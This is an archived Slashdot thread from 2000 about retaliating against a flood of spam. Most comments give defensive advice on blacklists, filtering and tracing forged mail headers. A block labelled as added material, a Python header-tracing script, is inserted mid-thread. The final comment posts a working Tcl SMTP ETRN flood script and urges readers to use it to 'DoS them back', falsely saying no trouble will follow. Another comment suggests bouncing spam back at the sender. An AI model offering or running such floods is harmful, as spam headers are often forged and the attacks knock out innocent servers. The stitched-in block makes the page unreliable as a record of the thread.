When Does Spam Equal "Denial of Service"?

gary.flake asks: "I've long accepted that I am always going to receive more spam than real e-mail. However, in the past 48 hours I've received over 9000 (that's NINE THOUSAND) spam messages from the same spammer. I've sent complaints to every postmaster whose IP address appears in the header. I have also set up a filter to delete the remaining influx (but ~1,700 still got by in the early stages). What now? One would think that this behavior would be outright illegal. But it also appears that the sender and the advertised spam Web site are outside of U.S. jurisdiction. Any suggestions on how to proceed?" Aside from filtering the problem address in question, what can one do?

"Here is a sample header (with my email address DELETED):

From - Sat Jul  1 10:11:08 2000
Return-Path:(DELETED)
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com
(InterMail vM.4.01.03.00 201-229-121) with ESMTP id

          for (DELETED)
          Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29])
	by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694
	for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net
(mx04.netaddress.usa.net [204.68.24.141])
	by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861
	for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01)
	with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174])
by gsnonweb.com  with Microsoft SMTPSVC(5.5.1877.197.19);
	 Sat, 1 Jul 2000 10:29:50 +0300
X-Mailer: Microsoft Outlook Express 5.00.2014.211
Date: Sat, 01 Jul 2000 00:30:14 -0800
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7BIT
From: auto65686@hushmail.com
Message-Id: 
Subject: You are invited to join our private club!
To: buddapest@LoadMail.com
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: "

  • by eap ( 91469 ) on Saturday July 15, 2000 @12:30PM (#930655) Journal
    I assume you're probably familiar with Junkbusters [junkbusters.com]. If not, try their software. It will allow you to block most unwanted email.

    Try joining the MAPS Realtime Blacklist [mail-abuse.org] of spammers.

    Report the sites listed in the headers to ORBS [orbs.org]. If they have open mail relays, ORBS will log them in its database and send a notification to the postmaster. Mail relays which support ORBS will not relay mail coming from unsecured hosts. If the sites are clean, no harm done, ORBS will not flag them.

    Finally, you can always work up a procmail script to filter out most spam. Sure, it doesn't keep spammers from using your network resources, but if everyone did it, spamming would be a lot less profitable.

    Hope this helps

  • Who did you piss off on-line in the last 5 days? If it's more than 6 folks, you might as well start armoring your system from this kinda stuff.

    Some people are screaming targets on the web. You just got zapped.
  • Save all evidence of the attack. Identify the spammer. Get a lawyer, extradite, and beat with a rubber hose until bright red. Then sue them. :) But seriously, the person may be located in the US, even if they are using overseas servers or accomplices. If you have the resources, you may be able to file suit.
    -----------------------------
  • I don't know about anything else, but the thought of doing anything involving a lawyer gives me the creeps. Even nailing a spammer.
  • All that does is cause a lot of work for a lot of people who had nothing to do with the spam.

    Sites like http://www.spamcop.com/, or http://www.spamwatcher.com/ (which I'm in the process of setting up now--don't expect much) will help you track the sender, and who to report the problem to. You want to complain to the ISP where the spam originated. You want to complain to the hosting provider of any URLs mentioned. You want to send a warning note to the relay, telling them that their mailer is misconfigured. The rest of the addresses should be ignored.

    These headers are nearly always forged:
    To: buddapest@LoadMail.com
    From: auto65686@hushmail.com
    Message-ID:
    The key is to look at the Received headers. They track the message as it goes from one machine to the next. Most, but not all, mail servers record the IP address of the sending machine, and there is no way to forge that. So the goal is to find the first real machine to receive the email, and see where it got the mail from. That machine will typically either be one of yours, or it will be some (idiot) machine which left its mail software open for others to use as a relay. In the latter case, it's worth notifying that company, as well as the originating ISP.

    Here are the Received headers in order:
    Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED) Sat, 1 Jul 2000 06:46:51 -0700
    Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
    Received: from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
    Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
    Couldn't parse (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000.
    Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
    Received: (apparently) from localhost ([216.8.12.174]) by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300

    If we ignore the forgeable names, that makes a chain, and for each element in the chain we can look it up and make sure that the chain makes sense.

    From: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
    To: gsnonweb.com (194.90.1.6)
    From: 194.90.101.35 (gsnews.gsnonweb.com)
    To: mx04 via mtad (34FM1.5.01) (Unknown)
    From: 204.68.24.141 (mx04.netaddress.usa.net)
    To: mx11-rwc.mail.home.com (24.0.95.29)
    From: 24.0.95.29 (mx11-rwc.mail.home.com)
    To: h11.mail.home.com (24.0.95.45)
    From: 24.0.95.45 (h11.mail.home.com)
    To: mail.rdc2.pa.home.com (24.12.106.196)

    So the spammer probably sent from 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net).
    And gsnonweb.com (194.90.1.6) is probably a system with an open relay.

    Here is information on the ISP that owns the domains in question.

    Spammer: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
    Ziplink Inc. (NETBLK-NET-ZIPLINK2)
    900 Chelmsford St., Tower 1, 5th Floor
    Lowell, MA 01851
    US

    Netname: NET-ZIPLINK2
    Netblock: 216.8.0.0 - 216.8.63.255
    Maintainer: ZIPL

    Coordinator:
    Clampitt, Dustin (DC35-ARIN) dclampitt@ZIPLINK.NET
    978 551 8602 (FAX) 978 970 0358

    Domain System inverse mapping provided by:

    PICNIC.ZIPLINK.NET 206.15.168.65
    TITANIC.ZIPLINK.NET 206.15.168.70

    Record last updated on 16-Nov-1999.
    Database last updated on 14-Jul-2000 18:30:27 EDT.

    The ARIN Registration Services Host contains ONLY Internet
    Network Information: Networks, ASN's, and related POC's.
    Please use the whois server at rs.internic.net for DOMAIN related
    Information and whois.nic.mil for NIPRNET Information.

    Relay: gsnonweb.com (194.90.1.6)
    inetnum: 194.90.0.0 - 194.90.6.255
    netname: NVNET1
    descr: NetVision Ltd.
    descr: ISP
    descr: Local Networks
    country: IL
    admin-c: NN105-RIPE
    tech-c: NN105-RIPE
    status: ASSIGNED PA
    mnt-by: NV-MNT-RIPE
    mnt-lower: NV-MNT-RIPE
    changed: noc-team@netvision.net.il 19990413
    source: RIPE

    route: 194.90.0.0/16
    descr: Netvision
    descr: Omega Bldg.
    descr: MATAM industrial park
    descr: Haifa 31905
    descr: Israel
    origin: AS1680
    advisory: AS690 1:1239 2:3561 3:6453
    mnt-by: NV-MNT-RIPE
    changed: noc-team@netvision.net.il 19990902
    source: RIPE

    role: Netvision NOC team
    address: Omega Building
    address: MATAM industrial park
    address: Haifa 31905
    address: Israel
    phone: +972 48 560 600
    fax-no: +972 48 551 132
    e-mail: noc-team@netvision.net.il
    trouble: Send abuse and spam reports to abuse@netvision.net.il
    admin-c: YG-RIPE
    admin-c: YS-RIPE
    admin-c: NNT-RIPE
    tech-c: YG-RIPE
    tech-c: YS-RIPE
    tech-c: NNT-RIPE
    tech-c: WAN-RIPE
    nic-hdl: NN105-RIPE
    notify: noc-team@netvision.net.il
    notify: hm-dbm-msgs@ripe.net
    mnt-by: NV-MNT-RIPE
    changed: noc-team@netvision.net.il 19990505
    changed: noc-team@netvision.net.il 20000315
    changed: noc-team@netvision.net.il 20000525
    changed: noc-team@netvision.net.il 20000531
    source: RIPE
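The chain walk described in the comment above, as an added example that is not part of the original thread: a Python script that parses the Received: lines quoted in the question, walks them from the recipient's own server downward, stops at the first hop whose "by" host does not match the host the line above says it received from, and reports the IP recorded by the last consistent hop as the probable origin and the host that wrote that line as the relay to complain to. The hops come from the header quoted in the question; the trailing hop from ns.example.test (203.0.113.9) is constructed here to show a spammer-prepended line being discarded.

```python
import re

# Received: lines copied from the header quoted in the question, in header
# order: the top line was added last, by the recipient's own mail server.
SAMPLE_RECEIVED = [
    "from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com "
    "(InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED) "
    "Sat, 1 Jul 2000 06:46:51 -0700",
    "from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) "
    "by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 "
    "for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)",
    "from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) "
    "by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 "
    "for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)",
    "(qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000",
    "from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) "
    "with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT",
    "(apparently) from localhost ([216.8.12.174]) by gsnonweb.com "
    "with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300",
]

# Constructed for this example (not from the page): a hop a spammer might
# prepend to the message before injecting it, hoping the reader blames
# ns.example.test instead of the real source.
FORGED_TAIL = (
    "from ns.example.test (ns.example.test [203.0.113.9]) "
    "by mail.example.test with SMTP id X; Sat, 1 Jul 2000 00:00:00 -0800"
)

# "from <name>" is whatever the sender said in HELO (forgeable); the bracketed
# IP is what the receiving server saw on the wire; "by <name>" is the server
# that wrote the line.
HOP_RE = re.compile(r"\bfrom\s+(?P<claimed>\S+)(?P<rest>.*?)\s+by\s+(?P<by>\S+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_hop(line):
    """Return {'claimed', 'ip', 'by'} for a relay hop, or None for a local
    injection line such as qmail's '(qmail 4654 invoked by uid 0)'."""
    m = HOP_RE.search(line)
    if not m:
        return None
    ip = IP_RE.search(m.group("rest"))
    return {"claimed": m.group("claimed"),
            "ip": ip.group(1) if ip else None,
            "by": m.group("by")}


def same_host(a, b):
    """Exact match, or a short name against its FQDN ('mx04' vs 'mx04.netaddress.usa.net')."""
    a, b = a.lower().rstrip("."), b.lower().rstrip(".")
    return a == b or a.startswith(b + ".") or b.startswith(a + ".")


def trace_origin(received):
    """Walk the hops from the trusted end (the recipient's own server) down.

    Each line is trusted only as far as the server that wrote it.  The line
    below it must have been written *by* the host the line above says it
    received *from*; the first mismatch is where the verifiable chain ends,
    everything below it is ignored, and the IP recorded by the last
    consistent hop is the best available origin."""
    hops = [h for h in map(parse_hop, received) if h]
    trusted = []
    for hop in hops:
        if trusted and not same_host(trusted[-1]["claimed"], hop["by"]):
            break
        trusted.append(hop)
    if not trusted:
        return None
    last = trusted[-1]
    return {"origin_ip": last["ip"],
            "relay": last["by"],
            "trusted_hops": len(trusted),
            "ignored_hops": len(hops) - len(trusted),
            "chain": [(h["ip"], h["by"]) for h in trusted]}


if __name__ == "__main__":
    for label, lines in (("as quoted", SAMPLE_RECEIVED),
                         ("with forged tail", SAMPLE_RECEIVED + [FORGED_TAIL])):
        r = trace_origin(lines)
        print(f"{label}: origin {r['origin_ip']} via {r['relay']}, "
              f"{r['trusted_hops']} hops trusted, {r['ignored_hops']} ignored")
```

On the quoted header this yields origin 216.8.12.174 and relay gsnonweb.com, the same conclusion the comment reached by hand; with the constructed forged hop appended, that hop's "by mail.example.test" does not match the "from localhost" recorded above it, so it is dropped and the answer does not change. The walk only tells you where to stop believing the chain: a spammer who knows the relay's name can write a consistent-looking line, so treat the result as "whose abuse desk to write to, quoting the IP their server recorded", not as proof of who sent the mail.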
  • make a script to send every e-mail received from that e-mail address back to that address and load the spammer down with his own spam?

    Rich
  • Company A spams you, but forges the headers and makes it look like Company C is spamming you.

    You (failing to realize that Company A is the real culprit) retaliate against Company C.

    Guess who is liable for the damages to Company C? (hint: you are)

    Even more fun is if their system has an auto-responder. You bounce to them, they bounce to you, bounce to them, bounce to you, bounce to them and so on.

  • DoS them Back. Try this. BTW, you think you will get in trouble for it? you won't. Take my word for it, i do this all the time from my machine. It runs on TCL. I made this a few months ago. It took Anticlan.com's ftp server down. Ya, it hits HARD. Hangs the mail server sending it. Works on sendmail, and most others. This is for anyone having trouble with spammers. Save this in a file and do 'tcl file', or 'tclsh file'.

    --------------------CUT HERE------------------

    set flood_count 2000
    set curr_count 30

    # Open one connection to host:port, send a bare ETRN and leave the
    # socket open (it is never closed, which is what ties up the server).
    proc do_port { host port } {
        puts stdout "Flooding $host:$port ..."
        if {![catch {socket $host $port} sockfd]} {
            puts stdout "CONNECTED.. "
            puts stdout "SENDING SHIT.. "

            puts $sockfd "ETRN x"

            puts stdout "DONE!"
        } else {
            puts stdout "FAILED."
        }
    }

    # "server" is the placeholder hostname as posted; the loop opens
    # flood_count - curr_count connections to port 25.
    while {$curr_count < $flood_count} {
        set curr_count [expr $curr_count + 1]
        do_port server 25
    }

    ----------------UNCUT HERE------------------

E = MC ** 2 +- 3db
